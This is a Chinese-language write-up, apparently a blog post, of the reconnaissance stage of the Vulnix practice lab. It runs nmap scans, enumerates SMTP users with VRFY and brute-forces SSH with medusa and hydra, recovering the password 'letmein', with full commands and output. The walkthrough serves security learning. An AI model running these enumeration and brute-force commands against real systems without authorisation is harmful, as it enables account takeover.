::: {.container}
::: {.post}
::: {.show-content}
HackLAB: Vulnix第一关(侦察)
=============================
nmap 192.168.1.109 -Pn -sV
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux;
protocol 2.0)25/tcp open smtp Postfix smtpd
79/tcp open finger Linux fingerd
110/tcp open pop3?
111/tcp open rpcbind 2-4 (RPC #100000)
143/tcp open imap Dovecot imapd
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3s?
2049/tcp open nfs_acl 2-3 (RPC #100227)
分析:该主机开放了简单邮件服务(端口25,SMTP)、NFS (Network
FileSystem)网络文件系统,看来该主机提供了多种服务,不过这种开放端口只怕只有进了内网才有。系统版本Linux
2.6.32 - 3.10
先用medusa爆破,先跑着字典,也不碍事。然后探测有没有服务的漏洞。字典下载地址
medusa -h 192.168.1.109 -U /root/Desktop/john.txt -P
/root/Desktop/pass.txt -e ns -M ssh -t 10 -O ssh.log
经过一段时间,爆破效果不佳。
检查弱口令:
nmap --script=auth 192.168.1.109
22/tcp open ssh
| ssh-auth-methods:
| Supported authentication methods:
支持的验证方式:publickey,password。后一种是传统的验证方式| publickey
|_ password
|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d
to debug)25/tcp open smtp
| smtp-enum-users:
|_ Method RCPT returned a unhandled status code.
SMTP简单邮件传输协议:
::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\
::: {.image-caption}
摘自《堆栈攻击:八层网络安全防御》
:::
:::
nmap有个脚本,枚举存在的用户名。https://nmap.org/nsedoc/scripts/smtp-enum-users.html
nmap --script smtp-enum-users.nse -p 25 192.168.1.109
结果:Couldn't find any accounts
nmap --script-args smtp-enum-users.methods={EXPN,RCPT,VRFY} -p 25
192.168.1.109结果2:Failed to resolve "smtp-enum-users.methods=RCPT".
Failed to resolve "smtp-enum-users.methods=VRFY". Nmap
scan report for 192.168.1.109
命令分析:
smtp提供了一个额外的功能,通过命令来检查用户名或额外的邮件列表。使用的是
VRFY and EXPN commands。
VRFY命令,能够检测系统上是否存在特定的邮件账户。如果服务器能够接受该命令,那么就可能遭受暴力枚举攻击。
smtp-user-enum -M VRFY -U
/usr/share/metasploit-framework/data/wordlists/unix_users.txt -t
192.168.1.109
枚举结果:
192.168.1.109: ROOT exists
192.168.1.109: backup exists
192.168.1.109: bin exists
192.168.1.109: daemon exists
192.168.1.109: games exists
192.168.1.109: gnats exists
192.168.1.109: irc exists
192.168.1.109: libuuid exists
192.168.1.109: list exists
192.168.1.109: lp exists
192.168.1.109: mail exists
192.168.1.109: man exists
192.168.1.109: messagebus exists
192.168.1.109: news exists
192.168.1.109: nobody exists
192.168.1.109: postmaster exists
192.168.1.109: proxy exists
192.168.1.109: root exists
192.168.1.109: sshd exists
192.168.1.109: sync exists
192.168.1.109: sys exists
192.168.1.109: syslog exists
192.168.1.109: user exists
192.168.1.109: uucp exists
192.168.1.109: www-data exists
结果验证:
::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\
::: {.image-caption}
:::
:::
用VRFY命令验证:如果用户存在,那么显示252,如果用户不存在,显示550。
ssh爆破:
爆破其实就是一个字典+运气的问题,在这里我作弊了,em..........…不作弊的话,应该将搜集到的所有用户名加入到一个字典里。
hydra -l user -P /root/Desktop/pass.txt 192.168.1.109 ssh -t 4
结果:[DATA] attacking ssh://192.168.1.109:22/
[22][ssh] host: 192.168.1.109 login: user password: letmein
1 of 1 target successfully completed, 1 valid password found
::: {.image-package}
{.uploaded-img
width=”auto” height=”auto”}\
::: {.image-caption}
:::
:::